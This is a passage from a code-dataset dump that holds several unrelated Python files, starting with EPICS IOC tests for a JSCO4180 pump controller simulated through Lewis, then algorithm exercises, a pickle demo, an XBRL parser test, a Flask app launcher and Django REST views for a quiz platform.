\"\"\"\n\n def setUp(self):\n self._lewis, self._ioc = get_running_lewis_and_ioc(DEVICE_NAME, DEVICE_PREFIX)\n self.ca = ChannelAccess(device_prefix=DEVICE_PREFIX, default_timeout=30, default_wait_time=0.0)\n for pv in required_pvs:\n self.ca.assert_that_pv_exists(pv, timeout=30)\n self._lewis.backdoor_run_function_on_device(\"reset\")\n\n def test_GIVEN_wrong_component_on_device_WHEN_running_THEN_retry_run_and_updates_component(self):\n expected_value_A = 30\n expected_value_B = 15\n expected_value_C = 55\n\n self.ca.set_pv_value(\"COMP:A:SP\", expected_value_A)\n self.ca.set_pv_value(\"COMP:B:SP\", expected_value_B)\n self.ca.set_pv_value(\"COMP:C:SP\", expected_value_C)\n\n self.ca.set_pv_value(\"START:SP\", 1)\n\n sleep(10)\n # Setting an incorrect component on the device will result in the state machine attempting\n # to rerun the pump and reset components.\n self._lewis.backdoor_set_on_device(\"component_A\", 25)\n self._lewis.backdoor_set_on_device(\"component_B\", 10)\n self._lewis.backdoor_set_on_device(\"component_C\", 14)\n\n self.ca.assert_that_pv_is(\"COMP:A\", expected_value_A, timeout=30)\n self.ca.assert_that_pv_is(\"COMP:B\", expected_value_B, timeout=30)\n self.ca.assert_that_pv_is(\"COMP:C\", expected_value_C, timeout=30)\n\n # there was a previous problem where if setpoint and readback differed a sleep and resend was started,\n # but the old state machine did not look to see if a new sp was issued while it was asleep and so then\n # resent the old out of date SP\n @unstable_test(max_retries=2, wait_between_runs=60)\n def test_GIVEN_wrong_component_on_device_WHEN_send_new_sp_THEN_state_machine_aborts_resend(self):\n value = 50\n self.ca.set_pv_value(\"COMP:A:SP\", value)\n self.ca.set_pv_value(\"COMP:B:SP\", value)\n self.ca.set_pv_value(\"START:SP\", 1)\n self.ca.assert_that_pv_is(\"STATUS\", \"Pumping\", timeout=5)\n self.ca.assert_that_pv_is(\"COMP:A\", value, timeout=30)\n self.ca.assert_that_pv_is(\"COMP:B\", value, timeout=30)\n\n # Setting an incorrect component on the device will result in the state machine attempting\n # to rerun the pump and reset components after a delay\n initial_delay = self.ca.get_pv_value(\"ERROR:DELAY\") # delay before state machine reset\n delay = 30 # Increase delay to avoid race conditions\n self.ca.set_pv_value(\"ERROR:DELAY\", delay)\n try:\n with self.ca.assert_pv_not_processed(\"RESET:SP\"):\n self._lewis.backdoor_set_on_device(\"component_A\", value - 5)\n self.ca.assert_that_pv_is(\"COMP:A\", value - 5, timeout=5)\n sleep(delay / 2.0)\n\n # however if we change setpoint, the loop should start again\n self._lewis.backdoor_set_on_device(\"component_A\", value - 5)\n self.ca.set_pv_value(\"COMP:A:SP\", value - 10)\n self.ca.set_pv_value(\"COMP:B:SP\", value + 10)\n # reset should not have happened yet\n self.ca.assert_that_pv_is(\"COMP:A\", value - 5, timeout=delay / 2.0)\n self.ca.assert_that_pv_value_is_unchanged(\"COMP:A\", wait=delay / 2.0)\n\n # Reset should now happen within a further timeout/2 seconds (but give it longer to avoid races)\n with self.ca.assert_pv_processed(\"RESET:SP\"):\n self.ca.assert_that_pv_is(\"COMP:A\", value - 10, timeout=delay * 2)\n finally:\n # Put error delay back to it's initial value\n self.ca.set_pv_value(\"ERROR:DELAY\", initial_delay)\n\n def test_GIVEN_wrong_component_on_device_WHEN_running_continuous_THEN_retry_run_and_updates_component_in_correct_mode(\n self):\n self.ca.set_pv_value(\"COMP:C:SP\", 0)\n\n value = 50\n expected_value = \"Pumping\"\n self.ca.set_pv_value(\"COMP:A:SP\", 
value)\n self.ca.set_pv_value(\"COMP:B:SP\", value)\n\n self.ca.set_pv_value(\"START:SP\", 1)\n\n # Give the device some time running in a good state\n sleep(10)\n # Sabotage! - Setting an incorrect component on the device will result in the state machine attempting\n # to rerun the pump and reset components.\n self._lewis.backdoor_set_on_device(\"component_A\", 33)\n\n self.ca.assert_that_pv_is(\"STATUS\", expected_value, timeout=30)\n\n def test_GIVEN_wrong_component_on_device_WHEN_running_timed_THEN_retry_run_and_updates_component_in_correct_mode(\n self):\n value = 50\n expected_value = \"Pumping\"\n self.ca.set_pv_value(\"COMP:A:SP\", value)\n self.ca.set_pv_value(\"COMP:B:SP\", value)\n self.ca.set_pv_value(\"TIME:RUN:SP\", 100)\n self.ca.set_pv_value(\"PUMP_FOR_TIME:SP\", 1)\n\n # Give the device some time running in a good state\n sleep(10)\n # Sabotage! - Setting an incorrect component on the device will result in the state machine attempting\n # to rerun the pump and reset components.\n self._lewis.backdoor_set_on_device(\"component_A\", 33)\n\n self.ca.assert_that_pv_is(\"STATUS\", expected_value, timeout=30)\n\n def test_GIVEN_an_ioc_WHEN_set_flowrate_THEN_flowrate_setpoint_is_correct(self):\n\n error_delay = float(self.ca.get_pv_value(\"ERROR:DELAY\"))\n sleep(2 * error_delay) # To make sure we're not in the middle of the error-checking state machine\n\n expected_value = 1.000\n self.ca.set_pv_value(\"FLOWRATE:SP\", expected_value)\n\n self.ca.assert_that_pv_is(\"FLOWRATE:SP:RBV\", expected_value)\n\n self.ca.set_pv_value(\"TIME:RUN:SP\", 100)\n self.ca.set_pv_value(\"START:SP\", \"Start\")\n\n self.ca.assert_that_pv_is(\"FLOWRATE\", expected_value)\n\n def test_GIVEN_an_ioc_WHEN_set_flowrate_and_pump_volume_THEN_ioc_uses_rbv_for_calculation_of_remaining_time(self):\n expected_sp_value = 1.000\n expected_rbv_value = 2.000\n pump_for_volume = 2\n expected_time_value = (pump_for_volume / expected_rbv_value) * 60\n\n error_delay = float(self.ca.get_pv_value(\"ERROR:DELAY\"))\n sleep(2 * error_delay) # To make sure we're not in the middle of the error-checking state machine\n\n # 1. set invalid flowrate setpoint (FLOWRATE:SP)\n self.ca.set_pv_value(\"FLOWRATE:SP\", expected_sp_value)\n self.ca.assert_that_pv_is(\"FLOWRATE:SP:RBV\", expected_sp_value)\n\n # 2. set valid hardware flowrate (FLOWRATE:SP:RBV) via backdoor command\n self._lewis.backdoor_set_on_device(\"flowrate_rbv\", expected_rbv_value)\n self.ca.assert_that_pv_is(\"FLOWRATE:SP:RBV\", expected_rbv_value)\n\n # 3. set volume setpoint and start pump\n self.ca.set_pv_value(\"TIME:VOL:SP\", pump_for_volume)\n self.ca.set_pv_value(\"START:SP\", \"Start\")\n\n # 4. check calculated time is based on flowrate setpoint readback (:SP:RBV rather than :SP)\n self.ca.assert_that_pv_is(\"TIME:VOL:CALCRUN\", expected_time_value)\n\n def test_GIVEN_an_ioc_WHEN_set_flowrate_and_pump_time_THEN_ioc_uses_rbv_for_calculation_of_remaining_volume(self):\n expected_sp_value = 1.000\n expected_rbv_value = 2.000\n pump_for_time = 120\n expected_volume_value = (pump_for_time * expected_rbv_value) / 60\n\n error_delay = float(self.ca.get_pv_value(\"ERROR:DELAY\"))\n sleep(2 * error_delay) # To make sure we're not in the middle of the error-checking state machine\n\n # 1. set invalid flowrate setpoint (FLOWRATE:SP)\n self.ca.set_pv_value(\"FLOWRATE:SP\", expected_sp_value)\n self.ca.assert_that_pv_is(\"FLOWRATE:SP:RBV\", expected_sp_value)\n\n # 2. 
set valid hardware flowrate (FLOWRATE:SP:RBV) via backdoor command\n self._lewis.backdoor_set_on_device(\"flowrate_rbv\", expected_rbv_value)\n self.ca.assert_that_pv_is(\"FLOWRATE:SP:RBV\", expected_rbv_value)\n\n # 3. set time setpoint and start pump\n self.ca.set_pv_value(\"TIME:RUN:SP\", pump_for_time)\n self.ca.set_pv_value(\"START:SP\", \"Start\")\n\n # 4. check calculated volume is based on flowrate setpoint readback (:SP:RBV rather than :SP)\n self.ca.assert_that_pv_is(\"TIME:RUN:CALCVOL\", expected_volume_value)\n\n # test to check that the IOC updates the flowrate RBV quickly enough\n # for the remaining volume calculation to be valid. simulates operation of a script.\n def test_GIVEN_an_ioc_WHEN_set_flowrate_and_immediately_set_pump_to_start_THEN_ioc_updates_rbv_for_calculation_of_remaining_volume(\n self):\n expected_sp_value = 2.000\n script_sp_value = 3.000\n pump_for_time = 120\n\n # 1. initialize flowrate\n self.ca.set_pv_value(\"FLOWRATE:SP\", expected_sp_value)\n self.ca.assert_that_pv_is(\"FLOWRATE:SP:RBV\", expected_sp_value, timeout=5)\n\n # 2. set new flowrate and immediately set pump to run, to simulate script\n self.ca.set_pv_value(\"FLOWRATE:SP\", script_sp_value)\n self.ca.set_pv_value(\"TIME:RUN:SP\", pump_for_time)\n self.ca.set_pv_value(\"START:SP\", \"Start\")\n\n # 3. calculate remaining volume\n expected_volume_value = (pump_for_time * self.ca.get_pv_value(\"FLOWRATE:SP:RBV\")) / 60\n\n # 4. check ioc calculation is as expected\n self.ca.assert_that_pv_is(\"TIME:RUN:CALCVOL\", expected_volume_value)\n\n def test_GIVEN_an_ioc_WHEN_set_maximum_pressure_limit_THEN_maximum_pressure_limit_is_correct(self):\n expected_value = 200\n self.ca.assert_setting_setpoint_sets_readback(expected_value, \"PRESSURE:MAX\")\n\n def test_GIVEN_an_ioc_WHEN_set_minimum_pressure_limit_THEN_minimum_pressure_limit_is_correct(self):\n expected_value = 100\n self.ca.set_pv_value(\"PRESSURE:MIN:SP\", expected_value)\n self.ca.assert_setting_setpoint_sets_readback(expected_value, \"PRESSURE:MIN\")\n\n def test_GIVEN_an_ioc_WHEN_continuous_pump_set_THEN_pump_on(self):\n self.ca.set_pv_value(\"START:SP\", 1)\n\n self.ca.assert_that_pv_is(\"STATUS\", \"Pumping\")\n\n def test_GIVEN_an_ioc_WHEN_timed_pump_set_THEN_timed_pump_on(self):\n # Set a run time for a timed run\n self.ca.set_pv_value(\"TIME:RUN:SP\", 10000)\n self.ca.set_pv_value(\"PUMP_FOR_TIME:SP\", 1)\n\n self.ca.assert_that_pv_is(\"STATUS\", \"Pumping\")\n\n def test_GIVEN_an_ioc_WHEN_get_current_pressure_THEN_current_pressure_returned(self):\n expected_value = 300\n self._lewis.backdoor_set_on_device(\"pressure\", expected_value)\n\n self.ca.assert_that_pv_is(\"PRESSURE\", expected_value)\n\n @parameterized.expand([\n (\"component_{}\".format(suffix), suffix) for suffix in [\"A\", \"B\", \"C\", \"D\"]\n ])\n def test_GIVEN_an_ioc_WHEN_get_component_THEN_correct_component_returned(self, component, suffix):\n expected_value = 10.0\n self._lewis.backdoor_set_on_device(component, expected_value)\n\n self.ca.assert_that_pv_is(\"COMP:{}\".format(suffix), expected_value)\n\n @parameterized.expand([\n (\"COMP:{}\".format(suffix), suffix) for suffix in [\"A\", \"B\", \"C\"]\n ])\n def test_GIVEN_an_ioc_WHEN_set_component_THEN_correct_component_set(self, component, suffix):\n expected_value = 100.0\n self.ca.set_pv_value(\"COMP:{}:SP\".format(suffix), expected_value)\n if component == \"COMP:A\":\n self.ca.set_pv_value(\"COMP:B:SP\", 0)\n self.ca.set_pv_value(\"COMP:C:SP\", 0)\n elif component == \"COMP:B\":\n 
self.ca.set_pv_value(\"COMP:A:SP\", 0)\n self.ca.set_pv_value(\"COMP:C:SP\", 0)\n elif component == \"COMP:C\":\n self.ca.set_pv_value(\"COMP:A:SP\", 0)\n self.ca.set_pv_value(\"COMP:B:SP\", 0)\n self.ca.set_pv_value(\"PUMP_FOR_TIME:SP\", \"Start\")\n\n self.ca.assert_that_pv_is(component, expected_value)\n\n def test_GIVEN_ioc_initial_state_WHEN_get_error_THEN_error_returned(self):\n expected_value = \"No error\"\n\n self.ca.assert_that_pv_is(\"ERROR\", expected_value)\n\n def test_GIVEN_ioc_in_hardware_error_state_WHEN_get_error_THEN_hardware_error_returned(self):\n expected_value = \"Hardware error\"\n self._lewis.backdoor_set_on_device(\"error\", ERROR_STATE_HARDWARE_FAULT)\n\n self.ca.assert_that_pv_is(\"ERROR\", expected_value)\n\n def test_GIVEN_ioc_in_error_state_WHEN_reset_error_THEN_error_reset(self):\n expected_value = \"No error\"\n self._lewis.backdoor_set_on_device(\"error\", ERROR_STATE_NO_ERROR)\n self.ca.set_pv_value(\"ERROR:SP\", \"Reset\")\n\n self.ca.assert_that_pv_is(\"ERROR\", expected_value)\n\n def test_GIVEN_ioc_in_error_state_WHEN_reset_error_THEN_error_reset(self):\n expected_value = \"No error\"\n self._lewis.backdoor_set_on_device(\"error\", ERROR_STATE_HARDWARE_FAULT)\n\n self.ca.assert_that_pv_is(\"ERROR\", expected_value)\n\n def test_GIVEN_device_not_connected_WHEN_get_error_THEN_alarm(self):\n self.ca.assert_that_pv_alarm_is('ERROR', ChannelAccess.Alarms.NONE, timeout=30)\n\n with self._lewis.backdoor_simulate_disconnected_device():\n self.ca.assert_that_pv_alarm_is('ERROR', ChannelAccess.Alarms.INVALID, timeout=30)\n \n # Assert alarms clear on reconnection\n self.ca.assert_that_pv_alarm_is('ERROR', ChannelAccess.Alarms.NONE, timeout=30)\n\n def test_GIVEN_timed_pump_WHEN_get_program_runtime_THEN_program_runtime_increments(self):\n self.ca.set_pv_value(\"TIME:RUN:SP\", 10000)\n self.ca.set_pv_value(\"PUMP_FOR_TIME:SP\", 1)\n\n self.ca.assert_that_pv_value_is_increasing(\"TIME\", wait=2)\n\n def test_GIVEN_timed_pump_WHEN_set_constant_pump_THEN_state_updated_to_constant_pump(self):\n # Set a run time for a timed run\n self.ca.set_pv_value(\"TIME:RUN:SP\", 10000)\n self.ca.process_pv(\"PUMP_FOR_TIME:SP\")\n expected_value = \"Pumping\"\n self.ca.assert_that_pv_is(\"STATUS\", expected_value)\n\n self.ca.process_pv(\"START:SP\")\n expected_value = \"Pumping\"\n self.ca.assert_that_pv_is(\"STATUS\", expected_value)\n\n def test_GIVEN_constant_pump_WHEN_set_timed_pump_THEN_state_updated_to_timed_pump(self):\n expected_value = \"Pumping\"\n\n self.ca.process_pv(\"START:SP\")\n self.ca.assert_that_pv_is(\"STATUS\", expected_value)\n\n # Set a run time for a timed run\n self.ca.set_pv_value(\"TIME:RUN:SP\", 10000)\n self.ca.process_pv(\"PUMP_FOR_TIME:SP\")\n self.ca.assert_that_pv_is(\"STATUS\", expected_value)\n\n def test_GIVEN_input_incorrect_WHEN_set_flowrate_THEN_trouble_message_returned(self):\n self._lewis.backdoor_set_on_device(\"input_correct\", False)\n self.ca.set_pv_value(\"FLOWRATE:SP\", 0.010)\n\n self.ca.assert_that_pv_is(\"ERROR:STR\", \"[Error:stack underflow]\")\n\n def test_GIVEN_command_seq_that_would_crash_pump_WHEN_command_seq_called_THEN_pump_crashes(self):\n self.ca.set_pv_value(\"_TEST_CRASH.PROC\", 1)\n\n self.ca.assert_that_pv_alarm_is(\"COMP:A\", ChannelAccess.Alarms.INVALID, timeout=30)\n\n def test_GIVEN_pump_running_WHEN_set_file_number_command_called_THEN_program_is_busy_error(self):\n expected_value = \"[Program is Busy]\"\n self.ca.set_pv_value(\"START:SP\", 1)\n self.ca.set_pv_value(\"FILE:SP\", 0)\n\n 
self.ca.assert_that_pv_is(\"ERROR:STR\", expected_value)\n\n @parameterized.expand([(\"low_set_time\", 100, 1, 1),\n (\"high_set_time\", 1000, 10, 1),\n (\"non_standard_set_time\", 456, 5, 1)])\n @unstable_test(max_retries=5)\n def test_GIVEN_pump_for_volume_WHEN_pumping_THEN_device_is_pumping_set_volume(self, _, time, volume, flowrate):\n # Set a target pump time a target pump volume. When we start a pump set volume run, then the remaining\n # time should be related to the target volume, and not the target time (that would be used for a pump for time).\n set_time = time\n set_volume = volume\n set_flowrate = flowrate\n expected_time = set_volume * set_flowrate * 60 # flow rate units = mL/min, so convert to seconds\n\n self.ca.set_pv_value(\"TIME:RUN:SP\", set_time)\n self.ca.set_pv_value(\"TIME:VOL:SP\", set_volume)\n self.ca.set_pv_value(\"FLOWRATE:SP\", set_flowrate)\n\n self.ca.process_pv(\"PUMP_SET_VOLUME:SP\")\n\n self.ca.assert_that_pv_is_within_range(\"TIME:REMAINING\", min_value=expected_time - 20,\n max_value=expected_time + 20)\n\n","repo_name":"ISISComputingGroup/EPICS-IOC_Test_Framework","sub_path":"tests/jsco4180.py","file_name":"jsco4180.py","file_ext":"py","file_size_in_byte":17284,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"65"} +{"seq_id":"38003721804","text":"\ndef find_numbers(list_of_numbers):\n \n if len(list_of_numbers) == 0: \n return \"empty list\"\n \n even_num_count = 0\n for number in list_of_numbers:\n\n if (len(str(number))%2) == 0:\n even_num_count += 1\n\n return print(even_num_count)\n\n\n#find_numbers([12,345,2,6,7896])\n\n\ndef sorted_squares(list_numbers):\n\n if len(list_numbers) == 0: \n return \"empty list\"\n\n for i, number in enumerate(list_numbers):\n list_numbers[i] = list_numbers[i] ** 2\n\n return print(sorted(list_numbers)) \n\n#sorted_squares([-4,-1,0,3,10])\n\n\ndef string_permutation(string1, string2):\n\n if string1 == string2:\n return True\n elif len(string1) != len(string2):\n return False\n else: \n count = 0\n for i, char in enumerate(sorted(string1)):\n if char == sorted(string2)[i]:\n count += 1\n\n return count == len(string1)\n\n\n#print(string_permutation(\"Charlie\",\"eilrah\"))\n\n\ndef URLify(string_in):\n\n if len(string_in) == 0: \n return \"empty string\"\n\n string_out = \"\"\n for i, char in enumerate(string_in):\n if i == 0 and char == \" \": \n string_out += \"%20\"\n elif char == \" \" and string_in[i-1] !=\" \":\n string_out += \"%20\"\n else: \n string_out += char\n return string_out\n\n#print(URLify(\"Mr John Smith \"))\n\narr = [1, 2, 3, 4]\n\n# a1 >= a2 <= a3 >= a4 <= a5 ...\n# [2, 1, 4, 3] (return this one)\n# [4, 1, 3, 2]\n# [1,2,3,4,5]\n#[2,1,4,3,5]\n# If there are mutliple answers, return the one which is lexicographically smallest\n\n# [1, 2, 3]\n# i = 0\n# i = 2\n\n# for i range(3)\n\n# for i range(0, 3, 2)\n\ndef wave_array(list_in):\n\n if len(list_in) ==0:\n return []\n elif len(list_in) == 1:\n return list_in\n else: \n list_in = sorted(list_in)\n\n for i in range(0,len(list_in)-1,2):\n temp = list_in[i]\n list_in[i] = list_in[i+1]\n list_in[i+1]= temp\n \n return list_in\n\nprint(wave_array([1, 2, 3, 4, 5, 6, 7]))\n \n\n\n\n\n# [1, 2, 3, 4] = [2,1,4,3]\n# [1, 2, 3, 4, 5] = [2,1,4,3,5]","repo_name":"CharlieShelbourne/algos-practice","sub_path":"dataStructures/data_structures.py","file_name":"data_structures.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} 
+{"seq_id":"29724453249","text":"import pickle\r\n\r\nmyUser = {'name': 'Jasamrit Rahala',\r\n 'posts': [\r\n \r\n {'Title': 'Title of the post',\r\n 'Content': 'Content of the post',\r\n 'Date': '10th March 2020'},\r\n \r\n {'Title': 'First day at Teens In AI 2020',\r\n 'Content': 'Wow I had the best day today, I learnt all about the ethics of technology and the process of design thinking',\r\n 'Date': '25th March 2020'}\r\n \r\n ]\r\n }\r\n\r\n\r\npickle.dump(myUser, open('myUser.prb', 'wb'))\r\n\r\nmyUser = pickle.load(open('myUser.prb', 'rb'))\r\nprint(myUser, '\\n has been successfully pickled')\r\n","repo_name":"JRahala/Flask-Introduction","sub_path":"6) Requests/init_user.py","file_name":"init_user.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"13016411333","text":"from pysecxbrl.parsing import SECParser\nfrom pysecxbrl.extract import XBRLExtractor\n\nimport os\n\nparser = SECParser()\nextractor = XBRLExtractor()\n\n# 'temp-data/0001564590-20-023322-xbrl/geos-20200331.xml'\n# temp-data/1002517_20200508-0001002517-20-000034-xbrl/nuan0331202010-q.htm.xml\n\nfolder = \"temp-data/1002517_20200508-0001002517-20-000034-xbrl/\"\n\nfiles = extractor.identifyFiles(folder)\nprint(files)\n\nmain_data_f = files[\"main\"][0]\ncalc_f = files[\"calculation\"][0]\n\nwith open(os.path.join(folder, calc_f)) as f:\n txt_calc = f.read()\n calc_elems = parser.parseCalculationXML(txt_calc)\n\n print(calc_elems)\n\nwith open(os.path.join(folder, main_data_f)) as f:\n txt = f.read()\n ctx_elems, data_elems = parser.parseMainXBRL(txt)\n\n print(\"parsing result: \")\n print(ctx_elems)\n print(data_elems)\n print(len(ctx_elems))\n print(len(data_elems))\n","repo_name":"zhaolewen/py-sec-xbrl","sub_path":"test-parse.py","file_name":"test-parse.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"65"} +{"seq_id":"15517756254","text":"import connexion\nimport logging\n\n\ndef main():\n logging.basicConfig(level=logging.DEBUG)\n app = connexion.App(__name__, specification_dir='./api/', options={\"swagger_ui\": True})\n #app.add_api('swapi-oa3.yaml', arguments={'title': 'SWAPI OpenAPI 3'})\n app.add_api('swapi-oa3.yaml',\n arguments={'title': 'SWAPI OpenAPI 3'},\n strict_validation=False,\n validate_responses=False,\n resolver=resolve_swapi_function\n )\n app.run(port=5000, debug=True)\n\n\ndef resolve_swapi_function(function_name):\n from . 
import swapi_controller\n\n swapi_functions = {'index': swapi_controller.index,\n 'get_all': swapi_controller.get_all,\n 'get_single': swapi_controller.get_single}\n\n return swapi_functions\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kewl-deus/swapi","sub_path":"swapi-flask/swapi/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"37652227640","text":"from django.shortcuts import render\nfrom rest_framework import viewsets, status, views\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework import serializers\nfrom .models import (\n Question,\n Answer,\n Course,\n UserCourseRelation,\n StrictMode,\n Hint,\n QuestionMedia,\n QuestionsSubscriptionRelation,\n)\nfrom .serializers import (\n QuestionSerializer,\n AnswerSerializer,\n CourseSerializer,\n QuestionListSerializer,\n CourseCreatedSerializer,\n RelationSerializer,\n RelationUnsubscribeSerializer,\n AnswerFormDataSerializer,\n StrictModeSerializer,\n QuestionMediaSerializer,\n HintSerializer,\n)\nfrom exam_auth.models import Profile\nfrom django.db.models import Q\nfrom django.contrib.auth.models import AnonymousUser\nfrom exam_backend.utils import upload_media_file\nimport requests\nfrom datetime import datetime\nimport time\n\n\nclass QuestionListViewSet(viewsets.ModelViewSet):\n queryset = Question.objects.all()\n serializer_class = QuestionListSerializer\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"get\"]\n\n def get_queryset(self):\n user = self.request.user\n user_subscriptions = QuestionsSubscriptionRelation.objects.filter(\n subscriber=user\n )\n if user.is_superuser:\n queryset = Question.objects.all()\n return queryset\n\n return Question.objects.all().filter(\n Q(user=user) | Q(user__in=[sub.subscription for sub in user_subscriptions])\n )\n\n\nclass UserSubcsriptionView(views.APIView):\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"post\"]\n\n def post(self, request):\n user = self.request.user\n data = self.request.data\n profile = Profile.objects.all().filter(user=user).first()\n if not profile or not data.get(\"subscription\"):\n return Response({\"message\": \"Profile not found\"}, 404)\n subscription = Profile.objects.all().filter(id=data[\"subscription\"]).first()\n if not subscription:\n return Response({\"message\": \"Profile not found\"}, 404)\n existing_subcsription = QuestionsSubscriptionRelation.objects.filter(\n subscriber=user, subscription=subscription.user\n )\n if not existing_subcsription:\n relation = QuestionsSubscriptionRelation(\n subscriber=user, subscription=subscription.user\n )\n relation.save()\n return Response({\"message\": \"Subscribed\"}, 200)\n else:\n existing_subcsription.delete()\n return Response({\"message\": \"Unsubscribed\"}, 200)\n\n\nclass CourseDemoAllowView(views.APIView):\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"post\"]\n\n def post(self, request):\n user = self.request.user\n data = self.request.data\n course = Course.objects.all().filter(token=data[\"course\"]).first()\n if not course:\n return Response({\"message\": \"Course not found\"}, 404)\n if not course.demo_allowed:\n course.demo_allowed = True\n course.save()\n return Response({\"message\": \"Enabled\"}, 200)\n else:\n course.demo_allowed = False\n course.save()\n return Response({\"message\": \"Disabled\"}, 200)\n\n\nclass 
AnswerFormDataViewSet(viewsets.ModelViewSet):\n queryset = Answer.objects.all()\n serializer_class = AnswerFormDataSerializer\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"post\", \"patch\", \"get\"]\n\n def get_queryset(self):\n if self.request.method == \"GET\":\n queryset = Answer.objects.all().filter(\n question=self.request.query_params.get(\"id\"),\n question__user=self.request.user,\n deleted=False,\n )\n\n return queryset\n\n user = self.request.user\n if user.is_superuser:\n queryset = Answer.objects.all().filter(deleted=False)\n return queryset\n return Answer.objects.all().filter(question__user=user, deleted=False)\n\n def create(self, request, *args, **kwargs):\n validated_data = self.request.data\n question = Question.objects.all().get(id=validated_data[\"question\"])\n answer = Answer(\n question=question,\n text=validated_data[\"text\"],\n correct=validated_data[\"correct\"].capitalize(),\n weight=validated_data[\"weight\"],\n priority=validated_data[\"priority\"],\n deleted=False,\n )\n if validated_data[\"image\"] != \"null\":\n answer.image = validated_data[\"image\"]\n answer.save()\n return Response({\"answer\": answer.id}, status=status.HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n validated_data = self.request.data\n\n answer = self.get_object()\n if \"text\" in validated_data:\n answer.text = validated_data[\"text\"]\n if \"image\" in validated_data:\n\n if validated_data[\"image\"] == \"null\":\n answer.image = \"\"\n else:\n if validated_data[\"image\"] != \"stay\":\n answer.image = validated_data[\"image\"]\n if \"correct\" in validated_data:\n answer.correct = (validated_data[\"correct\"]).capitalize()\n if \"weight\" in validated_data:\n answer.weight = validated_data[\"weight\"]\n if \"priority\" in validated_data:\n answer.priority = validated_data[\"priority\"]\n answer.save()\n return Response({\"answer\": answer.id}, status=status.HTTP_201_CREATED)\n\n def destroy(self, request, *args, **kwargs):\n instance = self.get_object()\n self.perform_destroy(instance)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def perform_destroy(self, instance):\n instance.delete()\n\n\nclass QuestionViewSet(viewsets.ModelViewSet):\n queryset = Question.objects.all()\n\n serializer_class = QuestionSerializer\n\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"get\", \"post\", \"put\", \"delete\", \"patch\"]\n lookup_field = \"id\"\n\n def create(self, request, *args, **kwargs):\n validated_data = self.request.data\n\n question = Question(\n user=self.request.user,\n title=validated_data[\"title\"],\n text=validated_data[\"text\"],\n answer_type=validated_data[\"answer_type\"],\n )\n\n if \"attempts_number\" in self.request.data:\n\n if self.request.data[\"attempts_number\"] != \"null\":\n\n question.attempts_number = self.request.data[\"attempts_number\"]\n else:\n pass\n # question.attempts_number = None\n if \"answers_number\" in validated_data:\n question.answers_number = validated_data[\"answers_number\"]\n if \"image\" in validated_data and validated_data[\"image\"] != \"null\":\n question.image_url = upload_media_file(validated_data[\"image\"])\n if \"audio\" in validated_data and validated_data[\"audio\"] != \"null\":\n question.audio_url = upload_media_file(validated_data[\"audio\"])\n if \"difficulty\" in validated_data:\n question.difficulty = validated_data[\"difficulty\"]\n if \"comment\" in validated_data:\n question.comment = validated_data[\"comment\"]\n\n question.save()\n # return 
QuestionSerializer(question), 201\n return Response(\n QuestionSerializer(question).data, status=status.HTTP_201_CREATED\n )\n\n def get_queryset(self):\n user = self.request.user\n if self.request.method == \"GET\":\n user_subscriptions = QuestionsSubscriptionRelation.objects.filter(\n subscriber=user\n )\n return Question.objects.all().filter(\n Q(id=self.request.query_params.get(\"id\"))\n & (\n Q(user=user)\n | Q(user__in=[sub.subscription for sub in user_subscriptions])\n )\n )\n\n if (\n user.is_superuser\n ): # TODO: either do this for all get's or delete it from here, no more methods support this logic\n queryset = Question.objects.all()\n return queryset\n return Question.objects.all().filter(user=user)\n\n def destroy(self, request, *args, **kwargs):\n instance = self.get_object()\n if self.request.method == \"DELETE\":\n\n # if it is delete request, then mark answer as 'deleted' and delete only question\n answers = Answer.objects.all().filter(question=instance.id)\n for ans in answers:\n ans.deleted = True\n ans.save()\n instance.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n else:\n Answer.objects.all().filter(question=instance.id).delete()\n # otherwise delete question with constraints\n self.perform_destroy(instance)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def partial_update(self, request, *args, **kwargs):\n validated_data = self.request.data\n question = self.get_object()\n # answers = Answer.objects.all().filter(question = question)\n # answers.delete() # we assume that there will be new answers after question\n\n question.title = validated_data[\"title\"]\n question.text = validated_data[\"text\"]\n question.answer_type = validated_data[\"answer_type\"]\n # question = Question(user=self.context['request'].user, title=validated_data['title'],\n # text=validated_data['text'], answer_type=validated_data['answer_type'])\n if \"attempts_number\" in validated_data:\n if validated_data[\"attempts_number\"] != \"null\" and (\n question.attempts_number is None\n or question.attempts_number <= validated_data[\"attempts_number\"]\n ):\n question.attempts_number = validated_data[\"attempts_number\"]\n if \"answers_number\" in validated_data:\n question.answers_number = validated_data[\"answers_number\"]\n if \"difficulty\" in validated_data and validated_data[\"difficulty\"] != \"null\":\n question.difficulty = validated_data[\"difficulty\"]\n if \"comment\" in validated_data:\n question.comment = validated_data[\"comment\"]\n\n if \"image\" in validated_data:\n\n if validated_data[\"image\"] == \"null\":\n question.image = \"\"\n else:\n if validated_data[\"image\"] != \"stay\":\n # question.image = validated_data['image']\n question.image_url = upload_media_file(validated_data[\"image\"])\n if \"audio\" in validated_data:\n\n if validated_data[\"audio\"] == \"null\":\n question.audio = \"\"\n else:\n if validated_data[\"audio\"] != \"stay\":\n question.audio = validated_data[\"audio\"]\n question.audio_url = upload_media_file(validated_data[\"audio\"])\n question.save()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def perform_destroy(self, instance):\n instance.delete()\n\n\nclass AnswerViewSet(viewsets.ModelViewSet):\n queryset = Answer.objects.all()\n serializer_class = AnswerSerializer\n permission_classes = (IsAuthenticated,)\n 